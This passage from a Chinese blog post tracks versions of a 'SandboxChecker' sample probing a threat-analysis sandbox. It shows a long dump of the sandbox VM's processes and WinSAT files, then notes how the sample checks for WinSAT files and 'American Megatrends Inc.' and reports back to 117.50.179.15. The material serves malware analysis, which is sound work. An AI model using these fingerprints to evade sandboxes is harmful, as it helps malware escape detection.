class=\"line\">111</span><br><span class=\"line\">112</span><br><span class=\"line\">113</span><br><span class=\"line\">114</span><br><span class=\"line\">115</span><br><span class=\"line\">116</span><br><span class=\"line\">117</span><br><span class=\"line\">118</span><br><span class=\"line\">119</span><br><span class=\"line\">120</span><br><span class=\"line\">121</span><br><span class=\"line\">122</span><br><span class=\"line\">123</span><br><span class=\"line\">124</span><br><span class=\"line\">125</span><br><span class=\"line\">126</span><br><span class=\"line\">127</span><br><span class=\"line\">128</span><br><span class=\"line\">129</span><br><span class=\"line\">130</span><br><span class=\"line\">131</span><br><span class=\"line\">132</span><br><span class=\"line\">133</span><br><span class=\"line\">134</span><br><span class=\"line\">135</span><br><span class=\"line\">136</span><br><span class=\"line\">137</span><br><span class=\"line\">138</span><br><span class=\"line\">139</span><br><span class=\"line\">140</span><br><span class=\"line\">141</span><br><span class=\"line\">142</span><br><span class=\"line\">143</span><br><span class=\"line\">144</span><br><span class=\"line\">145</span><br><span class=\"line\">146</span><br><span class=\"line\">147</span><br><span class=\"line\">148</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs yaml\"><span class=\"hljs-string\">systemInfo=Computer</span> <span class=\"hljs-attr\">Name:</span> <span class=\"hljs-string\">DESKTOP-H9URB7T,</span> <span class=\"hljs-attr\">CPU Cores:</span> <span class=\"hljs-number\">4</span><span class=\"hljs-string\">,</span> <span class=\"hljs-attr\">Hard Drives:</span> <span class=\"hljs-number\">2</span><br><span class=\"hljs-attr\">Directory Contents:</span> <br><span class=\"hljs-string\">desktop.ini</span><br><span class=\"hljs-string\">Microsoft</span> <span class=\"hljs-string\">Edge.lnk</span><br><br><span class=\"hljs-attr\">WinSAT:</span> <br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.25</span><span class=\"hljs-number\">.993</span><span class=\"hljs-string\">.winsat.etl</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Cpu.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Disk.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">DWM.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Graphics3D.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Mem.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.08</span><span class=\"hljs-number\">.10</span><span class=\"hljs-number\">.544</span> <span class=\"hljs-string\">Formal.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><br><span class=\"hljs-attr\">Process Name:</span> [<span class=\"hljs-string\">System</span> <span class=\"hljs-string\">Process</span>]<span class=\"hljs-string\">,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">0</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">System,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">Registry,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">96</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">smss.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">324</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">csrss.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">440</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">wininit.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">516</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">csrss.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">524</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">winlogon.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">616</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">services.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">660</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">lsass.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">680</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">792</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">816</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">fontdrvhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">836</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">fontdrvhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">844</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">924</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">988</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">dwm.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">352</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">508</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">812</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">656</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1088</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1096</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1160</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1164</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1184</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1236</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1296</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1348</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1380</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1392</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1416</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1452</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1516</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1648</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1696</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1708</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1720</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1812</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1824</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1900</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1932</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">spoolsv.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1116</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">audiodg.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">720</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1512</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2052</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2132</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2180</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2536</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2544</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2552</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2560</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">AcrylicService.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2568</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2576</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2584</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2628</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2804</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3056</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">752</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">sppsvc.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2508</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SppExtComObj.Exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">760</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3084</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3196</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3328</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">sihost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3572</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3596</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3772</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ctfmon.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3860</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">taskhostw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3900</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">explorer.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3188</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3692</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3724</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ChsIME.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3648</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4212</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">StartMenuExperienceHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4220</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4256</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RuntimeBroker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4416</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ApplicationFrameHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4716</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MicrosoftEdge.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4736</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">browser_broker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4844</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4944</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">dllhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5020</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">Windows.WARP.JITService.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5028</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RuntimeBroker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3804</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MicrosoftEdgeCP.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4352</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MicrosoftEdgeSH.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4496</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5284</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WeChat.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5544</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">taskhostw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5932</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6068</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">TrustedInstaller.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6132</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3468</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">usocoreworker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5564</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">TiWorker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5732</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5492</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">668</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WmiPrvSE.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4796</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WmiPrvSE.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3916</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4952</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6028</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WeChat.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6092</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">PWTXIkBXCb.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2432</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">unsecapp.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3608</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ShellExperienceHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2204</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4004</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">persfw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3212</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2636</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">QQ.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3524</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SafeDogGuardCenter.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5984</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">sihost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1848</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">backgroundTaskHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2824</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">Detonate.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5812</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">BgackgroundTransferHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5040</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RemindersServer.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3884</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">vba32lder.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5612</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">wrctrl.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1336</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">safedog.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6032</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SafeDogSiteIIS.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5652</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SafeDogServerUI.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1948</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">GoogleUpdate.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5856</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">audiodg.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4312</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">taskhostw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2640</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WUDFHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1524</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SafeDogGuardCenter.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5188</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WmiPrvSE.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6064</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">GoogleUpdateSetup.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6004</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SafeDogTray.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2652</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">safedogupdatecenter.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4988</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1924</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ShellExperienceHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">672</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RuntimeBroker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6184</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6996</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SandboxCheck.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6352</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">conhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6312</span><br><br></code></pre></td></tr></table></figure>\n\n<blockquote>\n<p>以下内容为奇思妙想内容</p>\n</blockquote>\n<p>WinSAT的信息似乎不会改变,是不是可以通过比对哈希来查看是否为微步虚拟机呢?</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405164335823.png\"></p>\n<h2 id=\"SandboxChecker-V1-2-1\"><a href=\"#SandboxChecker-V1-2-1\" class=\"headerlink\" title=\"SandboxChecker V1.2.1\"></a>SandboxChecker V1.2.1</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405170635549.png\"></p>\n<p>间隔20分钟的程序,只是多了个打开计算器<code>ShellExecuteW(0i64, L&quot;open&quot;, L&quot;calc.exe&quot;, 0i64, 0i64, 1);</code></p>\n<p>查询作者精神状态,,,,</p>\n<h2 id=\"SandboxChecker-V1-3-0\"><a href=\"#SandboxChecker-V1-3-0\" class=\"headerlink\" title=\"SandboxChecker V1.3.0\"></a>SandboxChecker V1.3.0</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405164952900.png\"></p>\n<p>在历时一天后,作者似乎发现了新的大陆.但是为什么要切换到VS2008啊 我不能理解(</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405165228725.png\"></p>\n<p>对的 作者开始察觉<code>C:\\Windows\\Performance\\WinSAT\\DataStore\\</code>隐藏着秘密,所以专门写了一个测试文件去检查目标文件是否存在并且回传到<code>117.50.179.15:4448</code></p>\n<h2 id=\"SandboxChecker-V1-3-1\"><a href=\"#SandboxChecker-V1-3-1\" class=\"headerlink\" title=\"SandboxChecker V1.3.1\"></a>SandboxChecker V1.3.1</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405165755925.png\"></p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405165954211.png\"></p>\n<p>变化不大,简单的水一下过去了.</p>\n<h2 id=\"SandboxChecker-V1-3-2\"><a href=\"#SandboxChecker-V1-3-2\" class=\"headerlink\" title=\"SandboxChecker V1.3.2\"></a>SandboxChecker V1.3.2</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405171157630.png\"></p>\n<p>VS版本切换到了2015 看起来还在Debug程序的上传功能?</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405171119743.png\"></p>\n<p>回传变更成了<code>117.50.179.15:4447</code></p>\n<h2 id=\"SandboxChecker-V1-3-3\"><a href=\"#SandboxChecker-V1-3-3\" class=\"headerlink\" title=\"SandboxChecker V1.3.3\"></a>SandboxChecker V1.3.3</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405171333235.png\"></p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405171442329.png\"></p>\n<p>回传变更成了<code>117.50.179.15:4446</code></p>\n<h2 id=\"SandboxChecker-V1-4-0\"><a href=\"#SandboxChecker-V1-4-0\" class=\"headerlink\" title=\"SandboxChecker V1.4.0\"></a>SandboxChecker V1.4.0</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405173701737.png\"></p>\n<p>1.4.0版本开始进军全新版本了</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405174029664.png\"></p>\n<p>开始搜寻是否存在<code>Formal.Assessment (Initial).WinS</code>的文件与此文件中是否包含 <code>American Megatrends Inc.</code></p>\n<p>如果存在则弹窗提示American Megatrends Inc.如果没有则打开计算器.</p>\n<h2 id=\"SandboxChecker-V1-5-0-4月7日追踪更新版\"><a href=\"#SandboxChecker-V1-5-0-4月7日追踪更新版\" class=\"headerlink\" title=\"SandboxChecker V1.5.0   4月7日追踪更新版\"></a>SandboxChecker V1.5.0   4月7日追踪更新版</h2><p><img 